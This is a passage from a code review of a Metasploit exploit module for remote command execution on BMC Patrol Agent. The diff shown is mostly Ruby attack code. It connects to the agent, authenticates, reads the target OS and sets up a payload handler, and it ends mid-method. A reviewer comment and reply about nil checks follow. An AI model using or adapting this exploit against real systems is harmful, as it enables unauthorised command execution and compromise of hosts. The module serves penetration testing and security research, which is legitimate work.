modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb

```diff
@@ -0,0 +1,1201 @@
+      ])
+
+    end
+
+  def finish
+    disconnect
+    $inflater.close
+    $deflater.close
+  end
+
+  def get_target_os( srv_info_msg )
+    lines = srv_info_msg.split("\n")
+    if lines[0] != "MS" and lines[1] != "{" and lines[-1] != "}"
+      print_error("Invalid server info msg.")
+      return
+    end
+
+    os = $nil
+    ver = $nil
+    lines[2..-2].each do |i|
+      val = i.split("=")
+      if val.length == 2
+        if val[0].strip! == "T"
+          os = val[1]
+        elsif val[0].strip! == "VER"
+          ver = val[1]
+        end
+      end
+    end
+    return [os,ver]
+  end
+
+  def get_cmd_output( cmd_output_msg )
+
+    lines = cmd_output_msg.split("\n")
+    if lines[0] != "PEM_MSG" and lines[1] != "{" and lines[-1] != "}"
+      print_error("Invalid command output msg.")
+      return
+    end
+
+    #Parse out command results
+    idx_start = cmd_output_msg.index("Result\x00")
+    idx_end = cmd_output_msg.index("RemPsl_user")
+    output = cmd_output_msg[idx_start+7..idx_end-1]
+
+    return output
+  end
+
+  def exploit
+
+    #Set to nil if the cmd is empty
+    if datastore['CMD'] == ""
+      datastore['CMD'] = $nil
+    end
+
+    #Manually start the handler if not running a single command
+    if datastore['CMD'] == $nil
+
+      datastore['DisablePayloadHandler'] = false
+
+      #Configure the payload handler
+      payload_instance.exploit_config = {
+        'active_timeout' => 180
+      }
+      # Set up the payload handlers
+      payload_instance.setup_handler
+
+      # Start the payload handler
+      payload_instance.start_handler
+    end
+
+    #Initialize zlib objects
+    $deflater = Zlib::Deflate.new(4, 15, Zlib::MAX_MEM_LEVEL, Zlib::DEFAULT_STRATEGY)
+    $inflater = Zlib::Inflate.new()
+
+    #Connect to the BMC Patrol Agent
+    connect
+    print_status("Connected to BMC Patrol Agent.")
+
+    #Create session msg
+    create_session
+    ret_data = receive_msg
+    if ret_data == $nil
+      print_error("Failed to receive session confirmation. Aborting.")
+      finish
+      return
+    end
+    ret_len = ret_data.length
+
+    #Authenticate
+    authenticate_user(datastore['USER'], datastore['PASSWORD'])
+
+    #receive the authentication response
+    ret_data = receive_msg()
+    if ret_data == $nil
+      print_error("Failed to receive authentication response. Aborting.")
+      finish
+      return
+    end
+
+    ret_msg = process_response( ret_data )
+    if ret_msg =~ /logged in/
+      print_status("Successfully authenticated user.")
+    else
+      print_error("Login failed. Aborting.")
+      finish
+      return
+    end
+
+
+    #receive the server info
+    ret_data = receive_msg()
+    if ret_data == $nil
+      print_error("Failed to receive server info msg. Aborting.")
+      finish
+      return
+    end
+    srv_info = process_response( ret_data )
+
+    #Get the target's OS from their info msg
+    target_os = get_target_os(srv_info)
```

Comment:
Your `process_response` function could return nil. You should still check that before passing the value to a different function.

Reply:
Removed nil case as it should either be compressed or uncompressed. While it should always be compressed, added code to handle unexpected case.